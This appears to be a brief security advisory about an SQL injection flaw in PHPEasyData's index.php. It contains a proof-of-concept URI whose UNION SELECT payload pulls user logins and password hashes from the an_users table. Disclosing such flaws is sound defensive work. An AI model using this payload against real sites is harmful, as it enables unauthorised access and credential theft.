|
PHPEasyData Index.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client. The following proof-of-concept URI and exploit are available: http://www.example.com/index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0,0/**/from/**/an_users/**/where/**/user_id%20like%205/* |
|
|
Privacy Statement |